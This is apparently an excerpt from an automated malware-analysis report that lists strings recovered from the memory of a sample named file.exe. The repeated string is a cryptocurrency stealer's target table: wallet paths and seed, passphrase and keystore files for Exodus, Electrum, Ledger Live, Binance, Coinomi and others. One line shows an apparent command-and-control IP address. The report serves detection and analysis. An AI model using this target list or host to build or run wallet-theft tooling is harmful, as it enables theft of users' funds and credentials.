Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: file.exe, 00000000.00000002.2113309307.0000000000B74000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: 1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: file.exe, 00000000.00000002.2113309307.0000000000B74000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: 1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: file.exe, 00000000.00000002.2113309307.0000000000B74000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: 1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: file.exe, 00000000.00000002.2113309307.0000000000B74000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: 1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: file.exe, 00000000.00000002.2113309307.0000000000B74000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: 1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: file.exe, 00000000.00000002.2113309307.0000000000B74000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: 1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: file.exe, 00000000.00000002.2113309307.0000000000B74000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: 1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: file.exe, 00000000.00000002.2113309307.0000000000B74000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: 1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: file.exe, 00000000.00000002.2113309307.0000000000B74000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: 1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: file.exe, 00000000.00000002.2113309307.0000000000B74000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: 1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: file.exe, 00000000.00000002.2113309307.0000000000B74000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: 1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: file.exe, 00000000.00000002.2114430584.00000000017E2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: 185.215.113.16nes\AppData\Roaming\Binance\simple-storage.json
Source: file.exe, 00000000.00000002.2113309307.0000000000B74000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: 1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
